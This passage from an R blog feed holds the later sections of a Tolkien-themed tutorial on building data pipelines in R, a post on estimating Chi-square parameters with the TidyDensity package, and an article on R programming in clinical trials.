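The same pattern should carry over to scheduled scripts: a clear error message at import time is usually easier to diagnose than a failure several steps later.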

Mastering the collection of data using R equips you to handle the foundational aspect of any data analysis project. By ensuring you have robust, reliable, and diverse data, your analyses can be as nuanced and comprehensive as the world crafted by the Ainur’s voices.

Refining the Harmony: Cleaning Data

Just as a symphony conductor must ensure that every instrument is precisely tuned to contribute to a harmonious performance, a data scientist must refine their collected data to ensure it is clean, structured, and ready for analysis. This chapter will guide you through the crucial process of cleaning data using R, which involves identifying and correcting inaccuracies, inconsistencies, and missing values in your data set.

Identifying Common Data Issues

Before diving into specific techniques, it’s essential to understand the common issues that can arise with raw data:

Missing Values: Data entries that are empty or contain placeholders that need to be addressed.
Duplicate Records: Repeated entries that can skew analysis results.
Inconsistent Formats: Data coming from various sources may have different formats or units, requiring standardization.
Outliers: Extreme values that could be errors or require separate analysis.
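
A quick profile of the raw data can show which of these issues are present before any cleaning starts. The following base R sketch is one possible approach; profile_data_issues() and the demo columns are invented for illustration.

```r
# Summarise common data problems in a data frame
# (hypothetical helper; the demo column names are made up)
profile_data_issues <- function(data) {
  list(
    missing_per_column = colSums(is.na(data)),
    duplicate_rows = sum(duplicated(data)),
    column_types = vapply(data, function(col) class(col)[1], character(1))
  )
}

demo <- data.frame(
  id = c(1, 2, 2, 4),
  city = c("Oslo", "oslo", "oslo", NA),
  amount = c(10, 12, 12, 900),
  stringsAsFactors = FALSE
)

issues <- profile_data_issues(demo)
issues$missing_per_column  # city has one missing value
issues$duplicate_rows      # rows 2 and 3 are identical, so one duplicate
issues$column_types        # helps spot columns read with the wrong type
```

Note that "Oslo" and "oslo" are not counted as duplicates here, which is exactly the kind of inconsistent format that standardization is meant to resolve.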

Using R Packages for Data Cleaning

R provides several packages that make the task of cleaning data efficient and straightforward:

tidyr: This package is instrumental in transforming data to a tidy format where each variable forms a column, each observation forms a row, and each type of observational unit forms a table.
dplyr: Useful for modifying data frames by removing duplicates, filtering out unwanted observations, and transforming data using its various functions.

Techniques for Cleaning Data

Here are some simple techniques to clean data effectively using R:

### Handling Missing Values

library(tidyr)
cleaned_data <- raw_data %>%
                drop_na()  # Removes rows with any NA values

### Removing duplicates

library(dplyr)
unique_data <- raw_data %>%
               distinct()  # Removes duplicate rows

### Standardizing Data Formats

# Converting all character columns to lowercase for consistency
# (numeric and other non-character columns are left untouched)
standardized_data <- raw_data %>%
                     mutate(across(where(is.character), tolower))

### Dealing with Outliers

# Identifying outliers based on statistical thresholds
# (keeps values strictly between the 1st and 99th percentiles)
bounds <- quantile(raw_data$variable, probs = c(0.01, 0.99), na.rm = TRUE)
filtered_data <- raw_data %>%
                 filter(variable > bounds[1] & variable < bounds[2])

Ensuring Data Quality

Post-cleaning, it’s important to verify the quality of your data:

Summarize Data: Get a quick overview using summary() to check if the data meets the expected standards.
Visual Inspections: Plot your data using packages like ggplot2 to visually inspect for any remaining issues.

The meticulous process of cleaning your data in R ensures that it is reliable and ready for detailed analysis. Just as the Ainur’s song required balance and precision to create a harmonious world, thorough data cleaning ensures that your analyses can be conducted without discord, leading to insights that are both accurate and actionable.

Shaping the Melody: Transforming Data

Once the data is cleansed of imperfections, the next task is akin to a composer arranging notes to create a harmonious melody. In the context of data science, transforming data involves reshaping, aggregating, or otherwise modifying it to better suit the needs of your analysis. This chapter explores how to use R to transform your cleaned data into a format that reveals deeper insights and prepares it for effective analysis.

Understanding Data Transformation

Data transformation includes a variety of operations that modify the data structure and content:

Aggregation: Combining multiple entries to reduce the data size and highlight important features.
Normalization: Scaling data to a specific range, useful for comparison and modeling.
Feature Engineering: Creating new variables from existing ones to enhance model predictability.

Utilizing R for Data Transformation

R offers powerful libraries tailored for these tasks, allowing precise control over the data transformation process:

dplyr: This package is essential for efficiently transforming data frames. It provides a coherent set of verbs that help you solve common data manipulation challenges.
tidyr: Helps in changing the layout of your data sets to make data more tidy and accessible.

Techniques for Transforming Data

### Aggregating Data:

library(dplyr)
aggregated_data <- raw_data %>%
                   group_by(category) %>%
                   summarize(mean_value = mean(value, na.rm = TRUE))

### Normalizing Data:

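# Min-max scaling to the [0, 1] range; na.rm = TRUE keeps a single NA
# from turning every normalized value into NA
normalized_data <- raw_data %>%
                   mutate(normalized_value = (value - min(value, na.rm = TRUE)) /
                            (max(value, na.rm = TRUE) - min(value, na.rm = TRUE)))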

### Feature Engineering:

engineered_data <- raw_data %>%
                   mutate(new_feature = log(old_feature + 1))
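
To make the three techniques concrete, here is a small worked example on made-up numbers. It is a sketch in base R rather than dplyr so that it runs without extra packages; the sales data frame and its columns are assumptions for illustration only.

```r
# Small made-up data set; the column names mirror the placeholders above
sales <- data.frame(
  category = c("a", "a", "b", "b"),
  value = c(10, 20, 30, 50)
)

# Aggregation: mean value per category (a = 15, b = 40)
category_means <- aggregate(value ~ category, data = sales, FUN = mean)

# Normalization: rescale `value` to the [0, 1] range (min-max scaling)
value_range <- range(sales$value, na.rm = TRUE)
sales$normalized_value <- (sales$value - value_range[1]) / diff(value_range)

# Feature engineering: log1p(x) computes log(1 + x)
sales$log_value <- log1p(sales$value)

category_means
sales
```

With a minimum of 10 and a maximum of 50, the normalized values are 0, 0.25, 0.5, and 1, which is an easy way to check the formula by hand.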

Best Practices in Data Transformation

To ensure that the transformed data is useful and relevant for your analyses, consider the following practices:

Relevance of Transformations: Make sure that the transformations align with your analytical objectives.
Maintainability: Document the transformations clearly, ensuring they are understandable and reproducible.
Efficiency: Optimize transformations for large data sets to prevent performance bottlenecks.

Transforming data effectively allows you to sculpt the raw, cleaned data into a form that is not only analytically useful but also rich in insights. Much like the careful crafting of a symphony from basic musical notes, skillful data transformation in R helps unfold the hidden potential within your data, enabling deeper and more impactful analyses.

Preserving the Echoes: Storing Data

After transforming and refining your data, the next critical step is to store it effectively. Much like the echoes of the Ainur’s music that shaped the landscapes of Arda, the data preserved in storage will form the foundation for all future analysis and insights. This chapter explores the various data storage options available in R and how to implement them efficiently.

Introduction to Data Storage Options in R

Data can be stored in several formats, each with its own advantages depending on the use case:

.RData/.Rds: These are R's native file formats. .RData can store multiple objects in a single file, whereas .Rds stores one object per file.
Parquet: A compressed, columnar storage format that supports nested data structures and allows selected columns to be read without loading the whole file.
Text and CSV Files: Simple, widely used formats that are easily readable by humans and other software, though not as space-efficient.

Choosing the Right Format

The choice of format depends on your needs:

For large datasets: Consider using Parquet for its efficiency in storage and speed in access, especially useful for complex analytical projects.
For R-specific projects: Use .RData and .Rds for their native compatibility and ability to preserve R objects exactly as they are in your environment.
For interoperability: Use CSV files when you need to share data with systems or individuals who may not be using R.

Saving Data Efficiently

To save data efficiently, consider the following R functions:

# Saving a single R object
saveRDS(object, file = "path/to/save/object.Rds")

# Saving multiple R objects
save(object1, object2, file = "path/to/save/objects.RData")

# Writing to a Parquet file
library(arrow)
write_parquet(data_frame, "path/to/save/data.parquet")

# Writing to a CSV file (row.names = FALSE avoids an extra index column)
write.csv(data_frame, "path/to/save/data.csv", row.names = FALSE)

These methods ensure that your data is stored in a manner that is not only space-efficient but also conducive to future accessibility and analysis.
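
The practical difference between a native format and a text format shows up when the data is read back. The sketch below uses only base R and temporary files; the records data frame is made up for the demonstration.

```r
# Made-up data frame with column types that plain text cannot describe
records <- data.frame(
  id = 1:3,
  group = factor(c("low", "high", "low"), levels = c("low", "high")),
  measured_on = as.Date(c("2024-01-01", "2024-01-02", "2024-01-03"))
)

rds_path <- tempfile(fileext = ".Rds")
csv_path <- tempfile(fileext = ".csv")

saveRDS(records, rds_path)
write.csv(records, csv_path, row.names = FALSE)

from_rds <- readRDS(rds_path)
from_csv <- read.csv(csv_path)

identical(records, from_rds)  # the .Rds round trip keeps the object as it was
sapply(from_csv, class)       # the CSV round trip returns plain column types
```

After the CSV round trip, the factor levels and the Date class have to be restored by hand, which is the trade-off for a format that other tools can read.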

By carefully selecting the appropriate storage format and effectively utilizing R’s data-saving functions, you ensure that your data is preserved accurately and efficiently. This practice not only secures the data for future use but also maintains its integrity and accessibility, akin to the lasting and unaltered echoes of a timeless melody.

Conducting the Orchestra: Automating and Orchestrating Data Pipelines

Automation serves as the conductor in the symphony of data analysis, ensuring that each component of the data pipeline executes in perfect harmony and at the right moment. This chapter explores how to automate and orchestrate data pipelines in R, enhancing both efficiency and reliability through advanced tools designed for task scheduling and workflow management.

The Importance of Automation

Automation in data pipelines is crucial for:

Consistency: Automatically executing tasks reduces the risk of human error and ensures uniformity in data processing.
Efficiency: Frees up data professionals to focus on higher-level analysis and strategic tasks.
Scalability: As data volumes grow, automated pipelines can handle increased loads without needing proportional increases in manual oversight.

Using R to Automate Data Pipelines

R offers several tools for automation, from simple script scheduling to sophisticated workflow management:

taskscheduleR: This package allows for the scheduling of R scripts on Windows systems. It is instrumental in ensuring that data collection, processing, and reporting tasks are performed without manual intervention.
targets: A powerful package that creates and manages complex data pipelines in R, handling task dependencies and ensuring that the workflow is reproducible and efficient.

Examples of Creating Automated Workflows

### Scheduling Data Collection with taskscheduleR

library(taskscheduleR)
script_path <- "path/to/your_data_collection_script.R"

# Schedule the script to run daily at 7 AM
taskscheduler_create(taskname = "DailyDataCollection",
                     rscript = script_path,
                     schedule = "DAILY",
                     starttime = "07:00")


### Building a Data Pipeline with targets:

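library(targets)

# Example of a targets pipeline definition (tar_script() writes it to _targets.R)
# my_cleaning_function() and analyze_data() are placeholders for your own
# functions, which must be defined or sourced inside the script
tar_script({
  library(targets)
  list(
    tar_target(
      raw_file,
      "path/to/data.csv", # Track the input file so changes trigger a rerun
      format = "file"
    ),
    tar_target(
      raw_data,
      readr::read_csv(raw_file) # Data collection
    ),
    tar_target(
      clean_data,
      my_cleaning_function(raw_data) # Data cleaning
    ),
    tar_target(
      analysis_results,
      analyze_data(clean_data) # Data analysis
    )
  )
})

# Run the pipeline; only outdated targets are rebuilt
# tar_make()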

Best Practices for Pipeline Automation

Monitoring and Logging: Implement logging within scripts to track when tasks run and capture any errors or critical warnings.
Regular Reviews: Periodically review and update the scripts, schedules, and data dependencies to adapt to new business needs or data changes.
Security Protocols: Ensure all automated tasks, especially those interacting with sensitive data or external systems, adhere to strict security protocols to prevent unauthorized access.
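
As a starting point for the monitoring and logging practice, the following sketch writes timestamped log lines with base R alone. The helper names log_event() and run_logged_step() are hypothetical; in a real project a dedicated logging package may be a better fit.

```r
# Append a timestamped line to a log file (base R only)
log_event <- function(level, message, log_file) {
  line <- sprintf("%s [%s] %s",
                  format(Sys.time(), "%Y-%m-%d %H:%M:%S"), level, message)
  cat(line, "\n", sep = "", file = log_file, append = TRUE)
  invisible(line)
}

# Run one pipeline step, logging its start, end, and any error
run_logged_step <- function(step_name, step_fun, log_file) {
  log_event("INFO", paste("Starting", step_name), log_file)
  tryCatch({
    result <- step_fun()
    log_event("INFO", paste("Finished", step_name), log_file)
    result
  }, error = function(e) {
    log_event("ERROR", paste(step_name, "failed:", conditionMessage(e)), log_file)
    NULL
  })
}

# Demonstration with two made-up steps, the second of which fails
log_file <- tempfile(fileext = ".log")
collected <- run_logged_step("collect", function() 1:10, log_file)
cleaned <- run_logged_step("clean", function() stop("unexpected column type"), log_file)
readLines(log_file)
```

Because a scheduled script runs without anyone watching the console, a log file like this is often the only record of what happened during a run.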

Effective automation of data pipelines in R not only ensures that data processes are conducted with precision and timeliness but also scales up to meet the demands of complex data environments. By employing tools like taskscheduleR and targets, you orchestrate a smooth and continuous flow of data operations, much like a conductor leading an orchestra to deliver a flawless performance.

Resolving Dissonances: Robustness and Error Handling in Data Pipelines

Just like a skilled composer addresses dissonances within a symphony, a data scientist must ensure data pipelines are robust enough to handle unexpected issues effectively. This chapter outlines strategies to enhance the robustness of data pipelines in R and offers practical solutions for managing errors efficiently.

The Need for Robustness in Data Pipelines

Robust data pipelines are crucial for ensuring:

Reliability: They must perform consistently under varying conditions and with different data inputs.
Maintainability: They should be easy to update or modify without disrupting existing functionalities.
Resilience: They need to recover quickly from failures to minimize downtime and maintain data integrity.

Enhancing Pipeline Robustness with R

R provides several tools and strategies to help safeguard your data pipelines:

Error Handling Mechanisms: tryCatch() allows you to manage errors effectively, executing alternative code when errors occur.
Logging: Tools like futile.logger or logger help record operations and errors, providing a trail that can be used to diagnose issues.
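
Resilience often comes down to retrying an operation that fails for temporary reasons, such as a network hiccup. Here is a minimal sketch of a retry helper with exponential backoff built on tryCatch(); with_retry() and flaky_fetch() are invented names, and the delays are illustrative.

```r
# Retry `operation` up to `max_attempts` times, waiting longer after each failure
with_retry <- function(operation, max_attempts = 3, base_delay = 0.1) {
  for (attempt in seq_len(max_attempts)) {
    result <- tryCatch(
      list(ok = TRUE, value = operation()),
      error = function(e) list(ok = FALSE, error = e)
    )
    if (result$ok) {
      return(result$value)
    }
    if (attempt < max_attempts) {
      Sys.sleep(base_delay * 2^(attempt - 1))  # exponential backoff
    }
  }
  stop("All ", max_attempts, " attempts failed: ",
       conditionMessage(result$error))
}

# Hypothetical flaky operation: fails twice, then succeeds
calls <- 0
flaky_fetch <- function() {
  calls <<- calls + 1
  if (calls < 3) stop("temporary network problem")
  "payload"
}

fetched <- with_retry(flaky_fetch)
```

Retries only make sense for errors that may resolve on their own; a malformed file will fail the same way every time and is better reported immediately.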

Implementing Error Handling Techniques

Effective error management involves several key strategies:

### Preventive Checks:

# Early data quality checks
if(anyNA(data)) {
  stop("Data contains NA values. Please check the source.")
}


### Graceful Error Management with tryCatch():

library(logger)

robust_processing <- function(data) {
  tryCatch({
    result <- some_risky_operation(data)
    log_info("Operation successful.")
    return(result)
  }, error = function(e) {
    log_error("Error in processing: ", e$message)
    send_alert_to_maintainer(paste0("Processing error encountered: ", e$message))
    NULL  # Return NULL or handle differently
  })
}


### Notification System:

Implementing an alert system can significantly improve the responsiveness to issues. Here’s how you can integrate such a system to send messages to the maintainer when something goes wrong:

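send_alert_to_maintainer <- function(message) {
  # Sends an email via mailR; the addresses and SMTP settings below are
  # placeholders to replace with your own mail server details
  mailR::send.mail(from = "pipeline@example.com",
                   to = "maintainer@example.com",
                   subject = "Data Pipeline Error Alert",
                   body = message,
                   smtp = list(host.name = "smtp.example.com", port = 25),
                   authenticate = FALSE,
                   send = TRUE)
}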

Best Practices for Robust Pipeline Design

Comprehensive Testing: Routinely test the pipeline using a variety of data scenarios to ensure robust handling of both typical and edge cases.
Regular Audits: Conduct periodic reviews of the pipeline to identify and rectify potential vulnerabilities before they cause failures.
Detailed Documentation and Training: Keep thorough documentation of the pipeline’s design and operational protocols. Ensure team members are trained on how to respond to different types of errors or failures.
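
Comprehensive testing can start small. The sketch below checks a hypothetical cleaning step against a typical case and two edge cases using stopifnot() from base R; in a package or larger project, a testing framework such as testthat would be the more usual choice.

```r
# Hypothetical cleaning step: drop incomplete rows, then drop duplicates
clean_records <- function(data) {
  complete <- data[stats::complete.cases(data), , drop = FALSE]
  unique(complete)
}

# Typical case: one NA row and one duplicated row are removed
typical <- data.frame(id = c(1, 2, 2, NA), value = c(5, 6, 6, 7))
stopifnot(nrow(clean_records(typical)) == 2)

# Edge case: an empty data frame should pass through without error
empty <- typical[0, ]
stopifnot(nrow(clean_records(empty)) == 0)

# Edge case: every row incomplete leaves nothing, but keeps the columns
all_missing <- data.frame(id = c(NA, NA), value = c(1, NA))
cleaned <- clean_records(all_missing)
stopifnot(nrow(cleaned) == 0, identical(names(cleaned), c("id", "value")))
```

Edge cases like empty inputs are worth covering because they tend to appear in production on the one day an upstream source delivers nothing.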

In the narrative of Ainulindalë, it is Melkor who introduces dissonance into the harmonious music of the Ainur, creating chaos amidst creation. Similarly, in the world of data pipelines, unexpected errors and issues can be seen as dissonances introduced by Melkor-like challenges, disrupting the flow and function of our carefully orchestrated processes. By foreseeing these potential disruptions and implementing effective error handling and notification mechanisms, we ensure that our data pipelines can withstand and adapt to these challenges. This approach not only preserves the integrity of the data analysis but also ensures that the insights derived from this data remain accurate and actionable, keeping the symphony of data in continuous, harmonious play despite Melkor’s attempts to thwart the music.

Among the Ainur: Integrating R with Other Technologies

In the grand ensemble of data technologies, R plays a role akin to one of the Ainur, a powerful entity with unique capabilities. However, just as the Ainur were most effective when collaborating under Ilúvatar’s grand plan, R reaches its fullest potential when integrated within diverse technological environments. This chapter discusses how R can be integrated with other technologies to enhance its utility and broaden its range of applications.

R’s Role in Diverse Data Ecosystems

R is not just a standalone tool but a part of a larger symphony that includes various data management, processing, and visualization technologies:

Cloud Computing Platforms: R can be used in cloud environments like AWS, Google Cloud, and Azure to perform statistical analysis and modeling directly on data stored in the cloud, leveraging scalable computing resources.
Big Data Platforms: Integrating R with big data technologies such as Apache Hadoop or Apache Spark enables users to handle and analyze data at scale, making R a valuable tool for big data analytics.
Data Warehousing: R can interface with data warehouses like Amazon Redshift, Snowflake, and others, which allows for sophisticated data extraction, transformation, and loading (ETL) processes, enriching the data analysis capabilities of R.
Business Intelligence Tools: Tools like Tableau, Power BI, and Looker can incorporate R for advanced analytics, bringing statistical rigor to business dashboards and reports.
Machine Learning Platforms: R’s integration with machine learning platforms like TensorFlow or PyTorch through various packages enables the development and deployment of complex machine learning models.
Workflow Automation Platforms: R can be a component in automated workflows managed by platforms like Alteryx or KNIME, which facilitate the blending of data, execution of R scripts, and publication of results across a broad user base.

Enhancing Collaboration with Other Technologies

Integrating R with other technologies involves not only technical synchronization but also strategic alignment:

Complementary Use Cases: Identify scenarios where R’s statistical and graphical tools can complement other platforms’ strengths, such as using R for ad-hoc analyses and modeling while using SQL databases for data storage and management.
Hybrid Approaches: Leverage the strengths of each technology by employing hybrid approaches. For instance, preprocess data using SQL or Python, analyze it with R, and then visualize results using a BI tool.
Unified Data Strategy: Develop a cohesive data strategy that aligns the data processing capabilities of R with other enterprise tools, ensuring seamless data flow and integrity across platforms.

R’s ability to integrate with a myriad of technologies transforms it from a solitary tool into a pivotal component of comprehensive data analysis strategies. Like the harmonious interplay of the Ainur’s melodies under Ilúvatar’s guidance, R’s integration with diverse tools and platforms allows it to contribute more effectively to the collective data analysis and decision-making processes, enriching insights and fostering informed business strategies.

The Theme Resounds: Conclusion

As our journey through the orchestration of data pipelines in R comes to a close, we reflect on the narrative of the Ainulindalë, where the themes of creation, harmony, and collaboration underpin the universe’s foundation. Similarly, in the realm of data science, the harmonious integration of various technologies and practices, guided by the powerful capabilities of R, forms the bedrock of effective data analysis.

Throughout this guide, we’ve explored:

Setting up and preparing R environments for data handling, emphasizing the importance of selecting the right tools and organizing workspaces efficiently.
Collecting, cleaning, and transforming data, which are critical steps that ensure the quality and usability of data for analysis.
Storing data efficiently in various formats, ensuring that data preservation aligns with future access and analysis needs.
Automating and orchestrating data pipelines to enhance efficiency and consistency, reducing manual overhead and increasing the reliability of data processes.
Integrating R with a multitude of technologies from cloud platforms to business intelligence tools, demonstrating R’s versatility and collaborative potential in broader data ecosystems.

The field of data science, much like the ever-evolving music of the Ainur, is continually expanding and transforming. As new technologies emerge and existing ones mature, the opportunities for integrating R into your data pipelines will only grow. Exploring these possibilities not only enriches your current projects but also prepares you for future advancements in data analysis.

Just as the Ainur’s music shaped the very fabric of Middle-earth, your mastery of data pipelines in R can significantly influence the insights and outcomes derived from your data. The tools and techniques discussed here are but a foundation — continuing to build upon them, integrating new tools, and refining old ones will ensure that your data pipelines remain robust, harmonious, and forward-looking.

As we conclude this guide, remember that the theme of harmonious data handling resounds beyond the pages. It is an ongoing symphony that you contribute to with each dataset you manipulate and every analysis you perform. Let the principles of robustness, integration, and automation guide you, and continue to explore and expand the boundaries of what you can achieve with R in the vast universe of data science.

Ainulindalë in R: Orchestrating Data Pipelines for World Creation was originally published in Numbers around us on Medium, where people are continuing the conversation by highlighting and responding to this story.

Estimating Chisquare Parameters with TidyDensity

Steven P. Sanderson II, MPH — Thu, 02 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

Hello R users! Today, let’s explore the latest addition to the TidyDensity package: util_chisquare_param_estimate(). This function is designed to estimate parameters for a Chi-square distribution from your data, providing valuable insights into the underlying distribution characteristics.

Understanding the Purpose

The util_chisquare_param_estimate() function is a powerful tool for analyzing data that conforms to a Chi-square distribution. It utilizes maximum likelihood estimation (MLE) to infer the degrees of freedom (dof) and non-centrality parameter (ncp) of the Chi-square distribution based on your input vector.

Getting Started

To begin, let’s generate a dataset that conforms to a Chi-square distribution:

library(TidyDensity)

# Generate Chi-square distributed data
set.seed(123)
data <- rchisq(250, df = 10, ncp = 2)  # 250 draws with 10 degrees of freedom and ncp = 2

# Call util_chisquare_param_estimate()
result <- util_chisquare_param_estimate(data)

By default, .auto_gen_empirical is set to TRUE, so the function automatically generates empirical distribution data. This means you’ll not only get the Chi-square parameters but also a combined table of empirical and Chi-square distribution data.

Exploring the Output

Let’s unpack what the function returns:

dist_type: Identifies the type of distribution, which will be “Chisquare” for this analysis.
samp_size: Indicates the sample size, i.e., the number of data points in your vector .x.
min, max, mean: Basic statistics summarizing your data.
dof: The estimated degrees of freedom for the Chi-square distribution.
ncp: The estimated non-centrality parameter for the Chi-square distribution.

This comprehensive output allows you to gain deeper insights into your data’s distribution characteristics, particularly when the Chi-square distribution is a potential model.

Let’s now take a look at the output itself.

library(dplyr)

result$combined_data_tbl |>
  head(5) |>
  glimpse()

Rows: 5
Columns: 8
$ sim_number  1, 1, 1, 1, 1
$ x           1, 2, 3, 4, 5
$ y           12.716908, 17.334453, 11.913559, 15.252845, 7.208524
$ dx          -2.100590, -1.952295, -1.803999, -1.655704, -1.507408
$ dy          2.741444e-05, 3.676673e-05, 4.930757e-05, 6.515313e-05, 8.6…
$ p           0.640, 0.848, 0.576, 0.744, 0.204
$ q           2.765968, 3.205658, 3.297085, 3.567437, 3.869764
$ dist_type   "Empirical", "Empirical", "Empirical", "Empirical", "Empiri…

result$combined_data_tbl |>
  tidy_distribution_summary_tbl(dist_type) |>
  glimpse()

Rows: 2
Columns: 13
$ dist_type   "Empirical", "Chisquare c(9.961, 1.979)"
$ mean_val    11.95263, 12.04686
$ median_val  10.79615, 11.48777
$ std_val     5.438087, 5.349567
$ min_val     2.765968, 1.922223
$ max_val     29.95844, 30.43480
$ skewness    0.9344797, 0.6903444
$ kurtosis    3.790972, 3.243122
$ range       27.19248, 28.51258
$ iqr         7.469292, 7.282262
$ variance    29.57279, 28.61787
$ ci_low      4.010739, 3.997601
$ ci_high     26.33689, 23.60014

Behind the Scenes: MLE Optimization

Under the hood, the function leverages MLE through the optim() function to estimate the Chi-square parameters. It minimizes the negative log-likelihood function to obtain the best-fitting degrees of freedom (dof) and non-centrality parameter (ncp) for your data.

Initial values for the optimization are intelligently set based on your data’s sample variance and mean, ensuring a robust estimation process.
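
To illustrate the general idea, here is a minimal sketch of maximum likelihood estimation for a non-central Chi-square distribution using optim() and dchisq() from base R. This is not the TidyDensity implementation: the method-of-moments starting values, the choice of the L-BFGS-B method, and the bounds are all assumptions made for this example.

```r
# Simulated data, generated the same way as earlier in this post
set.seed(123)
x <- rchisq(250, df = 10, ncp = 2)

# Negative log-likelihood of a non-central Chi-square distribution
neg_log_lik <- function(par, x) {
  -sum(dchisq(x, df = par[1], ncp = par[2], log = TRUE))
}

# Method-of-moments starting values (an assumption of this sketch), using
# mean = df + ncp and variance = 2 * (df + 2 * ncp)
m <- mean(x)
v <- var(x)
ncp_start <- max(v / 2 - m, 0.01)
df_start <- max(m - ncp_start, 0.01)

# Minimize the negative log-likelihood, keeping df > 0 and ncp >= 0
fit <- optim(
  par = c(df_start, ncp_start),
  fn = neg_log_lik,
  x = x,
  method = "L-BFGS-B",
  lower = c(1e-6, 0)
)

estimates <- c(dof = fit$par[1], ncp = fit$par[2])
estimates
```

The degrees of freedom and the non-centrality parameter both shift the mean, so the data constrains their sum much more tightly than either value alone. That is one reason sensible starting values matter for this kind of fit.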

Visualizing the Results

One of the strengths of TidyDensity is its seamless integration with visualization tools like ggplot2. With the combined output from util_chisquare_param_estimate(), you can easily create insightful plots that compare the empirical distribution with the estimated Chi-square distribution.

result$combined_data_tbl |>
  tidy_combined_autoplot()

This example demonstrates how you can visualize the empirical data overlaid with the fitted Chi-square distribution, providing a clear representation of your dataset’s fit to the model.

Conclusion

In summary, util_chisquare_param_estimate() from TidyDensity is a versatile tool for estimating Chi-square distribution parameters from your data. Whether you’re exploring the underlying distribution of your dataset or conducting statistical inference, this function equips you with the necessary tools to gain valuable insights.

If you haven’t already, give it a try and let us know how you’re using TidyDensity to enhance your data analysis workflows! Stay tuned for more updates and insights from the world of R programming. Happy coding!

De-Mystifying R Programming in Clinical Trials

Venkatesan Balu — Thu, 02 May 2024 00:00:00 +0000

[This article was first published on pharmaverse blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

R has not always been a popular or obvious choice for clinical trials. Although its use has grown significantly in recent years, adoption in clinical trials is still less widespread than might be expected. Practical implementation faces several obstacles, including occasional misunderstandings (particularly around validation) and a notable lack of awareness of R's capabilities. Despite these challenges, R is steadily establishing a growing presence within the pharmaceutical industry.

Opportunities for R Programming in Clinical Trials

Although R is versatile and applicable in various settings, it is commonly associated with scientific computing and statistics. In the context of clinical trials, where researchers aim to understand and enhance drug development and testing processes, R has become a prominent tool for analyzing the collected data. While SAS® has been a longstanding programming language for clinical trials, the industry has been exploring alternative options. There is a quest for sustainable technology and tools that can effectively address industry challenges.

To drive innovation, there is a need to move away from traditional, inefficient processes and tools toward solutions that are efficient, simple, easy to implement, reliable, and cost-effective. Collaboration among industry stakeholders is crucial to develop a robust technology ecosystem and establish consensus on validation and regulatory benchmarks. Equally vital is preparing the workforce with the necessary skillsets to meet future demands.

Current Usage Trends of R

Current trends in the pharmaceutical industry show that R usage still has room to grow in pharma regulatory submissions. However, R is used extensively in public health projects, healthcare economics, exploratory and scientific analysis, trend identification, generating plots and graphs, specific statistical analyses, and machine learning. R continues to advance steadily in clinical trials but is not yet widely used within the clinical space.

This is an area that we see gradually evolving thanks to a number of across-industry efforts such as pharmaverse.

SAS® or R Programming: Which is Better?

The ongoing debate in the programming community revolves around whether to replace SAS® with R, use both, or explore other alternatives like Python. Instead of adopting an either-or scenario, leveraging the strengths of each programming language for specific Data Science problems is recommended, recognizing that one size does not fit all. Early adopters of R have faced challenges, with regulatory compliance for R packages being a common issue. Even so, there have been notable successes that highlight the benefits and potential of using R in regulated industries.

For R to be considered for tasks related to regulatory submission, a rigorous risk assessment of R packages, feasibility analysis, and the establishment of processes for R usage through pilot projects with necessary documentation becomes imperative. We see great progress in this area through efforts such as the R Consortium R Submissions WG.

Benefits of Using R Programming

R, as a language and environment for statistical computing and graphics, possesses characteristics that make it a potentially powerful tool for Data Analysis. With approximately 2 million users worldwide and three decades of legacy, R stands out as open-source software receiving substantial support from the community. Its availability under the GNU General Public License and extensive documentation contribute to its strength. R is versatile, running on various platforms, offering a wide array of statistical and graphical techniques, and its ease of producing publication-quality plots enhances its appeal.

The pharmaceutical industry has witnessed the emergence of various R packages tailored for Clinical Trial reporting. Examples include {rtables} for creating tables for reporting clinical trials, {admiral} for CDISC ADaM, {pkglite} to support eSubmission, and many others. Pharmaverse packages cater to different aspects of clinical trial data analysis, showcasing the versatility of R in this domain.

This article discusses the use of R in clinical trials and how the industry can take advantage of its open-source nature. The FDA emphasizes the need to fully document software packages used for statistical analysis in submissions. The use of R poses specific validation challenges, given its free and open-source nature. To address this, the R Validation Hub has released guidance documents focusing on this area.

Because R packages are free of charge, R can also serve as a tool for API integration. For instance, in signal detection, R packages can be valuable because of the intricate derivation of the EBGM (Empirical Bayes Geometric Mean) in the Bayesian approach, which aims to mitigate false positive signals resulting from multiple comparisons. The computation adjusts the observed-to-expected reporting ratio for temporal trends and confounding variables such as age and sex. While both methods can estimate this, the accessibility of R as free software enables easy integration into any system as an API or for macro estimation purposes without copyright issues. As always, though, consult the license of any package being used to be sure your usage is in compliance.

Identifying the Limitations in Using R Programming

Software cost matters to any company, including pharma and biotech firms. While R and RStudio® are free and SAS® requires an annual license, using R instead of SAS® may not always lower costs, because the cost of the software is only one part of the equation. In a highly regulated industry such as pharmaceuticals, software validation, maintenance, and support are critical, and their costs need to be considered. Although R is free and open source, it comes with a learning curve, and in the short term the industry might face a shortage of experienced pharma R programmers compared with those familiar with SAS®.

Leveraging the Right Tools to Capture Value

Capturing the value of R programming starts with a clear vision for its use and a systematic approach to identifying and prioritizing the needs in the industry. Clinical Data Science is evolving rapidly, and the industry actively seeks alternative solutions to unlock valuable insights from diverse datasets. Recognizing the need for innovation, collaboration, and efficient tools is crucial. Rather than viewing SAS®, R, and Python as mutually exclusive, leveraging the strengths of each for appropriate Data Science problems provides a nuanced and effective approach.

Ensuring data quality, scientific integrity, and regulatory compliance through risk assessment frameworks, validation, and documentation is imperative in this dynamic landscape. Pharmaverse is also actively steering the pharmaceutical industry’s path by pioneering connections and advocating for R, thus exemplifying the broader trend of industries acknowledging the value and potential of open-source tools in tackling complex challenges.

Last updated

2024-05-02 12:57:13.410429

Details

source code, R environment

Reuse

CC BY 4.0

Citation

BibTeX citation:

@online{balu2024,
  author = {Balu, Venkatesan},
  title = {De-Mystifying {R} {Programming} in {Clinical} {Trials}},
  date = {2024-05-02},
  url = {https://pharmaverse.github.io/blog/posts/2024-04-15_de-_mystifying__.../de-_mystifying__r__programming_in__clinical__trials.html},
  langid = {en}
}

For attribution, please cite this work as:

Balu, Venkatesan. 2024. “De-Mystifying R Programming in Clinical Trials.” May 2, 2024. https://pharmaverse.github.io/blog/posts/2024-04-15_de-_mystifying__…/de-_mystifying__r__programming_in__clinical__trials.html.

To leave a comment for the author, please follow the link and comment on their blog: pharmaverse blog.

Continue reading: De-Mystifying R Programming in Clinical Trials

How to add Axes to Plot in R

R Archives » Data Science Tutorials — Wed, 01 May 2024 04:22:59 +0000

